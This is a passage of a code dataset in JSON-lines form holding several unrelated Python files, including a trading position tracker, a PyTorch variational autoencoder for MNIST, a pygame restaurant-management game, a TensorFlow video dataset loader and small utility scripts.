TradeSituation.generate_next_id()\n # Check arguments sanity.\n if take_profit_in_bps_arg < 0.00:\n raise Exception(\"Please note that the take profit has to be positive (:2.2f)\"\n .format(take_profit_in_bps_arg))\n # Set up the rest of variables\n self.__is_best_price_calculation = is_best_px_calc\n self.__is_long_trade = is_long_trade_arg\n self.__take_profit_in_bps = take_profit_in_bps_arg\n self.__amount = amount\n # Call self.open_position(...) to open the position immediately\n self.open_position(open_order_arg)\n\n def open_position(self, quote_arg: Quote):\n \"\"\"\n Flags the is_closed to False. Saves the entry order.\n :param quote_arg: quote class's instance expected. The first quote.\n :return:\n \"\"\"\n # Sets the __executed_open_quote to argument's value and flags __is_closed to FALSE\n opening_quote_way: BuySell = BuySell.SELL if self.__is_long_trade else BuySell.BUY\n self.__executed_open_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(opening_quote_way,\n self.__amount)\n self.__arrived_open_quote = quote_arg\n self.__is_closed = False\n\n def close_position(self, quote_arg: Quote):\n \"\"\"\n Flags the position as closed. Calculates final PnL\n :param quote_arg: last quote\n :return:\n \"\"\"\n # Reference quote\n self.__arrived_close_quote = quote_arg\n # Sets the __executed_close_quote to argument's value, flags __is_closed to TRUE\n if self.__is_long_trade:\n self.__executed_close_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.BUY,\n self.__amount)\n else:\n self.__executed_close_quote = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.SELL,\n self.__amount)\n if self.__executed_close_quote is not None:\n if self.__is_long_trade:\n # Buy with Offer, close the position with Bid\n self.__pnl_bps = self.__executed_close_quote.price() - self.__executed_open_quote.price()\n else:\n # Sell with Bid, close the position with Offer\n self.__pnl_bps = self.__executed_open_quote.price() - self.__executed_close_quote.price()\n # otherwise keep the approx PNL\n else:\n warnings.warn(\"Could not retrieve the corresponding order to close the position\", RuntimeWarning)\n\n self.__is_closed = True\n\n def update_on_order(self, quote_arg: Quote) -> bool:\n \"\"\"\n Updates all the variables in the position. Calculates the PnL.\n :param quote_arg: the latest quote\n :return: returns True if the position was closed (target profit reached)\n \"\"\"\n # Check if the position is alive. Return false if the position is dormant\n if self.__is_closed:\n return False\n # Check/update current pnl and draw down\n self.calculate_pnl_and_dd()\n # Check if target pnl was reached\n if self.__pnl_bps >= self.__take_profit_in_bps:\n # Target pnl reached: close position\n self.close_position(quote_arg)\n return True\n\n # PnL target not reached: return false\n return False\n\n def calculate_pnl_and_dd(self) -> float:\n \"\"\"\n Calculates (and updates) the PnL and draw down for the position\n :param quote_arg: the current quote. Given only for statistics purpose. The best price is kept in the order book\n :return: current pnl\n \"\"\"\n # In case the position is not opened (not alive) return the value stored in __pnl_bps\n if self.__is_closed:\n return self.__pnl_bps\n\n # Calculate pnl (different for LONG and SHORT; if we use the best price or not)\n if self.__is_best_price_calculation:\n # Get the best price on market (faster)\n if self.__is_long_trade:\n if TradeSituation.__common_order_book.get_best_bid() is not None:\n price_reference = TradeSituation.__common_order_book.get_best_bid_price()\n else:\n # No price available\n return self.__pnl_bps\n else:\n if TradeSituation.__common_order_book.get_best_offer() is not None:\n price_reference = TradeSituation.__common_order_book.get_best_offer_price()\n else:\n # No price available\n return self.__pnl_bps\n else:\n # Get the price by amount (slower)\n if self.__is_long_trade:\n corresponding_order = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.BUY,\n self.__amount)\n else:\n corresponding_order = TradeSituation.__common_order_book.get_best_orders_by_amount(BuySell.SELL,\n self.__amount)\n if corresponding_order is not None:\n price_reference = corresponding_order.price()\n else:\n # No price available\n return self.__pnl_bps\n\n if self.__is_long_trade:\n # Buy with Offer, close the position with Bid\n self.__pnl_bps = price_reference - self.__executed_open_quote.price()\n else:\n # Sell with Bid, close the position with Offer\n self.__pnl_bps = self.__executed_open_quote.price() - price_reference\n\n # Calculate draw down\n if self.__pnl_bps < 0.00 and -self.__pnl_bps > self.__max_dd_in_bps:\n self.__max_dd_in_bps = -self.__pnl_bps\n\n # return __pnl_bps\n return self.__pnl_bps\n\n def return_current_pnl(self) -> float:\n \"\"\"\n Returns the current (or final if the position is closed) pnl.\n :return:\n \"\"\"\n return self.__pnl_bps\n\n def return_current_draw_down(self) -> float:\n \"\"\"\n Returns the current (or final if the position is closed) maximum draw down.\n :return:\n \"\"\"\n return self.__max_dd_in_bps\n\n def trade_situation_id(self) -> int:\n \"\"\"\n Returns this trade situation ID\n :return:\n \"\"\"\n return self.__trade_situation_id\n\n def is_closed(self):\n \"\"\"\n Returns true if the position was closed previously\n :return:\n \"\"\"\n return self.__is_closed\n\n @staticmethod\n def generate_next_id():\n TradeSituation.__common_trade_situation_id += 1\n return TradeSituation.__common_trade_situation_id\n\n @staticmethod\n def set_limit_order_book(limit_order_book: LimitOrderBook):\n TradeSituation.__common_order_book = limit_order_book\n","sub_path":"trade_situation.py","file_name":"trade_situation.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"125016645","text":"# variational auto encoders\nfrom __future__ import print_function\nfrom __future__ import division\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torchvision import datasets\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport time\nimport sys\nimport re\nimport os\nimport imageio\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nparser = argparse.ArgumentParser()\nsubparsers = parser.add_subparsers(title=\"subcommands\", dest=\"subcommand\")\n\ntrain_parser = subparsers.add_parser(\"train\")\ntrain_parser.add_argument('--batch_size', type=int, default=128, metavar=\"N\",\n help=\"input batch size for training (default: 128)\")\ntrain_parser.add_argument('--epochs', type=int, default=20, metavar=\"N\",\n help=\"number of epoches to train (default: 10)\")\ntrain_parser.add_argument('--log_step', type=int, default=20,\n metavar=\"N\", help=\"number of steps to print log\")\n\neval_parser = subparsers.add_parser(\"eval\")\neval_parser.add_argument('--batch_size', type=int, default=128, metavar=\"N\",\n help=\"input batch size for training (default: 128)\")\neval_parser.add_argument('--model', type=str, required=True)\nconfig = parser.parse_args()\n\n\ntrain_loader = DataLoader(\n datasets.MNIST('../dataset', train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=config.batch_size,\n shuffle=True\n)\ntest_loader = DataLoader(\n datasets.MNIST('../dataset', train=False, transform=transforms.ToTensor()),\n batch_size=config.batch_size,\n shuffle=True\n)\n\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.fc1 = nn.Linear(784, 400)\n self.fc21 = nn.Linear(400, 20)\n self.fc22 = nn.Linear(400, 20)\n self.fc3 = nn.Linear(20, 400)\n self.fc4 = nn.Linear(400, 784)\n\n def encode(self, x):\n h1 = F.relu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n if self.training:\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps.mul(std).add_(mu)\n else:\n return mu\n\n def decode(self, z):\n h3 = F.relu(self.fc3(z))\n return torch.sigmoid(self.fc4(h3))\n\n def forward(self, x):\n mu, logvar = self.encode(x.view(-1, 784))\n z = self.reparameterize(mu, logvar)\n return self.decode(z), mu, logvar\n\n\ndef loss_function(recon_x, x, mu, logvar):\n BCE = F.binary_cross_entropy(recon_x, x.view(-1, 784), reduction='sum')\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return BCE + KLD\n\n\ndef train(config, epoch):\n model.train()\n train_loss = 0\n for batch_idx, (data, _) in enumerate(train_loader):\n data = data.to(device)\n optimizer.zero_grad()\n recon_batch, mu, logvar = model(data)\n loss = loss_function(recon_batch, data, mu, logvar)\n loss.backward()\n train_loss += loss.item()\n optimizer.step()\n if batch_idx % config.log_step == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\t Loss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset), 100. *\n batch_idx / len(train_loader), loss.item() / len(data)\n ))\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / len(train_loader.dataset)))\n\n\ndef test(config, epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_loader):\n data = data.to(device)\n recon_batch, mu, logvar = model(data)\n test_loss += loss_function(recon_batch, data, mu, logvar).item()\n if i == 0:\n n = min(data.size(0), 8)\n comparison = torch.cat([data[:n],\n recon_batch.view(config.batch_size, 1, 28, 28)[:n]])\n torchvision.utils.save_image(comparison.cpu(),\n 'outputs/vae-reconstruction_' + str(epoch) + '.png', nrow=n)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.4f}'.format(test_loss))\n\n\nmodel = VAE().to(device)\n\nif __name__ == \"__main__\":\n print(config)\n if config.subcommand is None:\n print(\"Error: please specify subcommand: train or eval\")\n sys.exit(1)\n if config.subcommand == \"train\":\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n for epoch in range(1, config.epochs + 1):\n train(config, epoch)\n test(config, epoch)\n with torch.no_grad():\n sample = torch.randn(64, 20).to(device)\n sample = model.decode(sample).cpu()\n torchvision.utils.save_image(sample.view(64, 1, 28, 28),\n 'outputs/vae-sample_' + str(epoch) + '.png')\n torch.save(model.state_dict(), 'saved_models/vae.pth')\n if config.subcommand == \"eval\":\n model.load_state_dict(torch.load('saved_models/vae.pth'))\n sample1 = torch.randn(1, 20)\n sample2 = torch.randn(1, 20)\n ds = (sample2 - sample1) / 63\n samples = []\n for i in range(64):\n samples.append(sample1 + ds * i)\n samples = torch.stack(samples).to(device)\n samples = model.decode(samples).cpu()\n torchvision.utils.save_image(samples.view(64, 1, 28, 28),\n 'outputs/vae-output.png')\n","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"398504560","text":"import fazbear.Globals as Globals\nimport pygame\nimport lightning\nimport time\nfrom pygame.locals import *\n\nclass Game(lightning.engine.Engine):\n '''Main game.'''\n\n # Constants\n EASY = \"easy\"\n NORMAL = \"normal\"\n HARD = \"hard\"\n\n MOVE_TOWARDS = \"move_towards\"\n TAKE_FOOD = \"take_food\"\n GIVE_FOOD = \"give_food\"\n STUFF_SUIT = \"stuff_suit\"\n CLEAN = \"clean\"\n KILL = \"kill\"\n\n\n def __init__(self, difficulty=NORMAL):\n super().__init__(W=800, H=600, caption=\"Fazbear Management PRE-ALPHA\")\n self.time = 6\n self.money = 100\n self.popularity = 50\n self.day = 1\n self.year = 1987\n self.difficulty = difficulty\n self.running = True\n\n self.timeText = lightning.text.Text(\"Time: %s\" %(self.time), (255,255,255), 15, 15, size=32)\n self.moneyText = lightning.text.Text(\"%s $\" %(self.money), (125,255,125), 15, 575, size=32)\n self.popularityText = lightning.text.Text(\"Popularity: %s %s\" %(self.popularity, \"%\"), (255,255,255), 15, 545, size=32)\n self.dayText = lightning.text.Text(\"Day %s\" %(self.day), (255,255,255), 15, 45, size=32)\n self.yearText = lightning.text.Text(\"Year: %s\" %(self.year), (255,255,255), 15, 75, size=32)\n\n self.initialize_map(\"maps\\\\freddy1.tmx\", 10, 10)\n\n self.main_loop()\n\n def initialize_map(self, map, focus_x, focus_y):\n self.load_map(map)\n self.tilemap.set_focus(focus_x, focus_y)\n\n self.objects = Objects()\n self.NPCs = Objects()\n self.objectsLayer = self.tilemap.layers[\"objects\"]\n self.topLayer = self.tilemap.layers[\"top\"]\n self.middleLayer = self.tilemap.layers[\"middle\"]\n self.layout = self.tilemap.layers[\"layout\"]\n\n print(self.layout[39, 13])\n\n for object in self.objectsLayer.objects:\n if object.type == \"table\":\n self.objects.add(Table(object, self.tilemap))\n\n if object.type == \"door_entrance\":\n self.objects.add(Door(object, self.tilemap, entrance_door=True))\n\n if object.type == \"door_staff\":\n self.objects.add(Door(object, self.tilemap, staff_door=True))\n\n if object.type == \"animatronic\":\n self.objects.add(Animatronic(object, self.tilemap))\n\n if object.type == \"NPC\":\n self.NPCs.add(NPC(object, self.tilemap))\n\n def handle_events(self):\n for event in pygame.event.get():\n\n if event.type == QUIT:\n self.running = False\n pygame.quit()\n return False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 4:\n Globals.mouseScrollUp = True\n\n if event.type == MOUSEBUTTONUP and event.button == 4:\n Globals.mouseScrollUp = False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 5:\n Globals.mouseScrollDown = True\n\n if event.type == MOUSEBUTTONUP and event.button == 5:\n Globals.mouseScrollDown = False\n\n if event.type == MOUSEBUTTONDOWN and event.button == 1:\n Globals.mouseClick = True\n\n if event.type == MOUSEBUTTONUP and event.button == 1:\n Globals.mouseClick = False\n\n if event.type == MOUSEMOTION:\n Globals.mousePos = event.pos\n Globals.mouseRel = event.rel\n\n if event.type == KEYDOWN:\n if event.key == K_UP:\n self.bonnie.moveUp()\n\n if event.key == K_DOWN:\n self.bonnie.moveDown()\n\n if event.key == K_LEFT:\n self.bonnie.moveLeft()\n\n if event.key == K_RIGHT:\n self.bonnie.moveRight()\n\n return True\n\n def main_loop(self):\n\n pygame.init()\n\n self.bonnie = self.NPCs[\"Bonnie_broken\"]\n\n for i in self.objects:\n print(i)\n\n while self.running:\n\n Globals.mouseRel = (0, 0)\n\n if self.handle_events():\n\n self.dt = self.clock.tick(60)\n self.screen.fill((0, 0, 0))\n\n if Globals.mouseClick and ((self.tilemap.fx <= self.tilemap.px_width) or (self.tilemap.fy <= self.tilemap.px_height)):\n self.tilemap.set_focus(self.tilemap.fx - Globals.mouseRel[0], self.tilemap.fy - Globals.mouseRel[1])\n\n self.tilemap.draw(self.screen)\n self.tilemap.update(self.dt)\n\n self.timeText.draw(self.screen)\n self.timeText.update(\"Time: %s\" %(self.time))\n\n self.yearText.draw(self.screen)\n self.yearText.update(\"Year: %s\" %(self.year))\n\n self.dayText.draw(self.screen)\n self.dayText.update(\"Day %s\" %(self.day))\n\n self.popularityText.draw(self.screen)\n self.popularityText.update(\"Popularity: %s %s\" %(self.popularity, \"%\"))\n\n self.moneyText.draw(self.screen)\n self.moneyText.update(\"%s $\" %(self.money))\n\n pygame.display.flip()\n\nclass Objects(list):\n def __init__(self):\n self.objects = {}\n\n def __getitem__(self, key):\n return self.objects.get(key)\n\n def __iter__(self):\n return self.objects.values().__iter__()\n\n def add(self, object):\n self.objects[object.name] = object\n\n def delete(self, obj_name):\n del self.objects[obj_name]\n\nclass TMX_Object():\n '''Base object class.'''\n def __init__(self, object, tilemap):\n self.object = object\n self.tilemap = tilemap\n self.name = object.name\n self.type = object.type\n self.properties = object.properties\n self.px, self.py = object.px, object.py\n self.x, self.y = pixel_to_screen(self.px, self.py)\n\n self.objectsLayer = self.tilemap.layers[\"objects\"]\n self.topLayer = self.tilemap.layers[\"top\"]\n self.middleLayer = self.tilemap.layers[\"middle\"]\n self.layout = self.tilemap.layers[\"layout\"]\n\n def __repr__(self):\n return '<%s \"%s\" at 0x%x>' % (self.__class__.__name__, self.name, id(self))\n\n def update(self):\n self.object.px = self.px\n self.object.py = self.py\n self.object.name = self.name\n self.object.type = self.type\n self.object.properties = self.properties\n self.x, self.y = pixel_to_screen(self.px, self.py)\n\nclass Table(TMX_Object):\n def __init__(self, object, tilemap):\n if object.type == \"table\":\n super().__init__(object, tilemap)\n\n else:\n raise ValueError('Object type is not \"table\".')\n\nclass Door(TMX_Object):\n def __init__(self, object, tilemap, staff_door=False, entrance_door=False):\n if object.type in [\"door_entrance\", \"door_staff\", \"door\"]:\n super().__init__(object, tilemap)\n self.staff_door = staff_door\n self.entrance_door = entrance_door\n\n else:\n raise ValueError('Object type is not \"door_entrance\", \"door_staff\" or \"door\"')\n\nclass NPC(TMX_Object):\n '''Base class for all NPCs.'''\n def __init__(self, object, tilemap):\n if object.type in [\"NPC\", \"animatronic\", \"staff\"]:\n super().__init__(object, tilemap)\n self.objective = None\n self.target = None\n\n else:\n raise ValueError('Object type is not \"NPC\", \"animatronic\" or \"staff\"')\n\n def moveUp(self):\n if self.layout[self.x, self.y] is not None:\n if self.layout[self.x, self.y].tile.gid not in [1, 9, 17, 42]:\n self.py = pixel_from_screen(y=self.y - 1)\n self.update()\n return True\n return False\n\n def moveDown(self):\n if self.layout[self.x, self.y + 2] != None:\n if self.layout[self.x, self.y + 2].tile.gid not in [1, 9, 17, 42]:\n self.py = pixel_from_screen(y=self.y + 1)\n self.update()\n return True\n return False\n\n def moveLeft(self):\n if self.layout[self.x - 1, self.y + 1] is not None:\n if self.layout[self.x - 1, self.y + 1].tile.gid not in [1, 9, 17, 42]:\n self.px = pixel_from_screen(x=self.x - 1)\n self.update()\n return True\n return False\n\n def moveRight(self):\n if self.layout[self.x + 1, self.y + 1] is not None:\n if self.layout[self.x + 1, self.y + 1].tile.gid not in [1, 9, 17, 42]:\n self.px = pixel_from_screen(x=self.x + 1)\n self.update()\n return True\n return False\n\nclass Animatronic(NPC):\n def __init__(self, object, tilemap):\n if object.type == \"animatronic\":\n super().__init__(object, tilemap)\n\n else:\n raise ValueError('Object type is not \"animatronic\"')\n\nclass Child(NPC):\n def __init__(self, object, tilemap):\n if object.type == \"child\":\n super().__init__(object, tilemap)\n self.happiness = 50\n self.hunger = 0\n self.isAlive = True\n\ndef pixel_to_screen(px=None, py=None):\n if px is not None and py is not None:\n x = int(round(px / 32, 0))\n y = int(round(py / 32, 0))\n return x, y\n\n if px is not None and py is None:\n x = int(round(px / 32, 0))\n return x\n\n if px is None and py is not None:\n y = int(round(py / 32, 0))\n return y\n\n if px is None and py is None:\n return None\n\ndef pixel_from_screen(x=None, y=None):\n if x is not None and y is not None:\n px = int(round(x * 32, 0))\n py = int(round(y * 32, 0))\n return px, py\n\n if x is not None and y is None:\n px = int(round(x * 32, 0))\n return px\n\n if x is None and y is not None:\n py = int(round(y * 32, 0))\n return py\n\n if x is None and y is None:\n return None\n","sub_path":"fazbear/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"46453285","text":"import itertools\nimport os\nimport random\nfrom collections import OrderedDict\nimport tensorflow as tf\nimport numpy as np\n\nfrom .base_dataset import VideoDataset\n\n\nclass SweeperVideoDataset(VideoDataset):\n def __init__(self, *args, **kwargs):\n super(SweeperVideoDataset, self).__init__(*args, **kwargs)\n self.dataset_name = os.path.basename(os.path.split(self.input_dir)[0])\n self.state_like_names_and_shapes['images'] = 'move/%d/image/encoded', (64, 64, 3)\n self.state_like_names_and_shapes['states'] = 'move/%d/state/position', (5,)\n self.action_like_names_and_shapes['actions'] = 'move/%d/action/velocity', (5,)\n self._check_or_infer_shapes()\n\n self.sess = tf.Session()\n\n def get_default_hparams_dict(self):\n default_hparams = super(SweeperVideoDataset, self).get_default_hparams_dict()\n hparams = dict(\n context_frames=2,\n sequence_length=15,\n use_state=True,\n )\n return dict(itertools.chain(default_hparams.items(), hparams.items()))\n\n @property\n def jpeg_encoding(self):\n return True\n\n def num_examples_per_epoch(self):\n #if os.path.basename(self.input_dir) == 'random_tf_records':\n # count = 900\n #else:\n # raise NotImplementedError\n return 1000\n\n def parser(self, serialized_example):\n \"\"\"\n Parses a single tf.train.Example into images, states, actions, etc tensors.\n \"\"\"\n features = dict()\n for i in range(self._max_sequence_length):\n for example_name, (name, shape) in self.state_like_names_and_shapes.items():\n if example_name == 'images': # special handling for image\n features[name % i] = tf.FixedLenFeature([64*64*3], tf.string)\n else:\n features[name % i] = tf.FixedLenFeature(shape, tf.float32)\n for i in range(self._max_sequence_length - 1):\n for example_name, (name, shape) in self.action_like_names_and_shapes.items():\n features[name % i] = tf.FixedLenFeature(shape, tf.float32)\n\n # add boolean feature for action\n features['action_exist'] = tf.FixedLenFeature([1], tf.int64)\n\n # check that the features are in the tfrecord\n for name in features.keys():\n if name not in self._dict_message['features']['feature']:\n raise ValueError('Feature with name %s not found in tfrecord. Possible feature names are:\\n%s' %\n (name, '\\n'.join(sorted(self._dict_message['features']['feature'].keys()))))\n\n # parse all the features of all time steps together\n features = tf.parse_single_example(serialized_example, features=features)\n\n state_like_seqs = OrderedDict([(example_name, []) for example_name in self.state_like_names_and_shapes])\n action_like_seqs = OrderedDict([(example_name, []) for example_name in self.action_like_names_and_shapes])\n for i in range(self._max_sequence_length):\n for example_name, (name, shape) in self.state_like_names_and_shapes.items():\n state_like_seqs[example_name].append(features[name % i])\n for i in range(self._max_sequence_length - 1):\n for example_name, (name, shape) in self.action_like_names_and_shapes.items():\n action_like_seqs[example_name].append(features[name % i])\n\n # set infer action variable\n # infer_action = 1 - features['action_exist']\n\n # for this class, it's much faster to decode and preprocess the entire sequence before sampling a slice\n _, image_shape = self.state_like_names_and_shapes['images']\n state_like_seqs['images'] = self.decode_and_preprocess_images(state_like_seqs['images'], image_shape)\n\n state_like_seqs, action_like_seqs = \\\n self.slice_sequences(state_like_seqs, action_like_seqs, self._max_sequence_length)\n return state_like_seqs, action_like_seqs #, infer_action\n\n # def make_batch(self, batch_size):\n # filenames = self.filenames\n # if self.mode == 'train':\n # random.shuffle(filenames)\n\n # dataset = tf.data.TFRecordDataset(filenames)\n # dataset = dataset.map(self.parser, num_parallel_calls=batch_size)\n # dataset.prefetch(2 * batch_size)\n\n # # Could shuffle individual samples but it becomes too slow. Just shuffle filenames instead.\n # # if self.mode == 'train':\n # # min_queue_examples = int(\n # # self.num_examples_per_epoch() * 0.4)\n # # # Ensure that the capacity is sufficiently large to provide good random\n # # # shuffling.\n # # dataset = dataset.shuffle(buffer_size=min_queue_examples + 3 * batch_size)\n\n # dataset = dataset.repeat(self.num_epochs)\n # dataset = dataset.batch(batch_size)\n # iterator = dataset.make_one_shot_iterator()\n # state_like_batches, action_like_batches, infer_action = iterator.get_next()\n # infer_action = self.sess.run(infer_action)\n # # import pdb; pdb.set_trace()\n\n # infer_action_batches = {'infer_action': infer_action}\n # input_batches = OrderedDict(list(state_like_batches.items()) + list(action_like_batches.items()) + list(infer_action_batches.items()))\n # for input_batch in input_batches.values():\n # if isinstance(input_batch, np.ndarray):\n # input_batch = np.reshape(input_batch, [batch_size, 1])\n # else:\n # input_batch.set_shape([batch_size] + [None] * (input_batch.shape.ndims - 1))\n # target_batches = state_like_batches['images'][:, self.hparams.context_frames:]\n # return input_batches, target_batches\n","sub_path":"video_prediction/datasets/sweeper_dataset.py","file_name":"sweeper_dataset.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"307847047","text":"def get_number_of_phrases():\r\n number = input(\"Enter number of phrases and press Enter: \")\r\n if number.isdigit():\r\n return int(number)\r\n else:\r\n return 3\r\n\r\n\r\ndef numeration_of_phrases(number):\r\n if number == 1:\r\n return \"First\"\r\n elif number == 2:\r\n return \"Second\"\r\n elif number == 3:\r\n return \"Third\"\r\n else:\r\n return f\"{number}th\"\r\n\r\n\r\ndef main():\r\n max_phrases_count = get_number_of_phrases()\r\n with open(\"phrases.out\", \"w\") as f:\r\n for number in range(1, max_phrases_count + 1):\r\n phrase = input(\"Enter the phrase and press Enter: \")\r\n if phrase == \"\":\r\n print(\"Thank you!\")\r\n return\r\n\r\n r_phrasse = phrase[::-1]\r\n number_of_phrase = numeration_of_phrases(number)\r\n print(f\"{number_of_phrase} phrase: {r_phrasse}\", file=f)\r\n\r\n print(\"Thank you!\")\r\n\r\n\r\nmain()\r\n","sub_path":"lesson7/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"454500328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 20:51:55 2020\n\n@author: hs101\n\"\"\"\n\n'''\n看看有多少种不同的股票\n保存文件stocks.csv\nReturns:\n 股票属性[股票代码,总市值,市盈率,每股收益]\nAttributes:\n 每股收益:指定日前推12个月的净利润除以最新总股本计算的每股收益。\n'''\n\nimport datetime\nfrom WindPy import w\nimport pandas as pd\ndataRaw = pd.read_csv('funds.csv',encoding = 'gbk').drop(columns = 'Unnamed: 0')\n\n\ndef count_time(func):\n def time(*args, **kwargs):\n start_time = datetime.datetime.now() # 程序开始时间\n result = func(*args, **kwargs)\n over_time = datetime.datetime.now() # 程序结束时间\n total_time = (over_time-start_time).total_seconds()\n print('程序 %s 共计%s秒' %(str(func).split(\" \")[1].ljust(15,\".\"),total_time))\n return result\n return time\n\n\n@count_time\ndef stocks_adding(stock_code_list):\n stocks_add = pd.DataFrame()\n for code in stock_code_list:\n stocks_add_temp = w.wsd(code, \"eps_ttm,avgreturny\", \"2020-05-12\", \"2020-05-12\", \"returnType=1\",usedf = True)[1]\n stocks_add = pd.concat([stocks_add,stocks_add_temp],sort=True).reset_index(drop=True) \n return stocks_add\n\n@count_time\ndef windProcess(stock_code_list):\n #stocks = w.wss(stock_code_list, \"province,mkt_cap_CSRC,pb_lyr\",\"unit=1;tradeDate=20200510\",usedf=True)[1]\n# stocks = w.wss(stock_code_list, \"ev3,pb_lyr\",\"unit=1; tradeDate=20200510; currencyType=rmb\",usedf=True)[1]\n\n# new_stock_code_list = stock_code_list[1:10]\n# stocks_add = stocks_adding(new_stock_code_list)\n # 省份 总市值 账面市值比 \n # 还缺一个变量 过去十二个月的收益 也就是动量\n stocks = w.wss(stock_code_list, \"ev3,pb_lyr,eps_ttm\",\"unit=1; tradeDate=20200510; currencyType=rmb\",usedf=True)[1]\n return stocks\n\n\n@count_time\ndef show_df(df): \n def printing(string):\n print(string.ljust(73,'-'))\n def printed(string):\n print(string.ljust(73,'='))\n print()\n printed(\"BEGIN\")\n printing(\"Index\")\n print(df.index)\n printing(\"Columns\")\n print(df.columns)\n printing(\"Head\")\n print(df.head())\n printing(\"Tail\" )\n print(df.tail())\n printed(\"END\")\n print()\n\n@count_time\ndef write_file(df,name,encoding = 'gbk'):\n df.to_csv(name, mode ='w+',encoding = 'gbk') \n \n@count_time\ndef main():\n fund = dataRaw\n lst = []\n count=0\n for i in range(1,11):\n count+=1\n # print(count)\n data = fund.iloc[:,2*i+1]\n for item in data:\n if item not in lst:\n lst.append(item) \n stock_code_list = lst\n \n stocks = windProcess(stock_code_list) \n show_df(stocks) \n write_file(stocks, \"stocks.csv\")\n\nif __name__ == '__main__':\n w.start() \n main()\n# w.stop()\n","sub_path":"WindFunds/数据备份 第三轮 第二天/DataBackUp/第二轮 第三天/process2.py","file_name":"process2.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502810791","text":"#!/usr/bin/python\nimport os,conf\n\nimport signal\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\ndef makeDirectory(dirname):\n\tif not os.path.exists(dirname):\n\t\tos.mkdir(dirname)\n\nmakeDirectory(conf.LOGDIR)\nxmls = os.listdir(conf.XMLDIR)\n\nminIndex=0\nmaxIndex=len(xmls)\n#minIndex=100\n#maxIndex=200\n\nfor xml in xmls:\n\tsuffix = '.' + xml.split('.')[-1] # suffix = .slcio\n\tbasename = xml.split(suffix)[0]\n\tindex = basename.split('_')[-1]\n\tif int(index) <= maxIndex and int(index) > minIndex :\n\t\tcmd = \"bsub -q s \" + \"-o \"+conf.LOGDIR+\"/\" + basename + \".log \" + '\\\"Marlin ' + conf.XMLDIR + '/' + xml.strip() + '\\\"'\n\t\tos.system(cmd)\n\t\t#print cmd\n\n","sub_path":"gen/SplitLcioFile/manyrun.py","file_name":"manyrun.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"317493321","text":"from PyQt5.QtWidgets import QApplication\nfrom ui.window import MainWindow\nimport sys\n\nif __name__ == \"__main__\":\n app = QApplication([])\n app.setApplicationName(\"Histogram Matcher\")\n\n window = MainWindow()\n window.setWindowTitle(\"BLG 453E - Homework I - Histogram Matching\")\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"253130610","text":"\n\nfrom xai.brain.wordbase.verbs._repay import _REPAY\n\n#calss header\nclass _REPAYS(_REPAY, ):\n\tdef __init__(self,): \n\t\t_REPAY.__init__(self)\n\t\tself.name = \"REPAYS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"repay\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_repays.py","file_name":"_repays.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
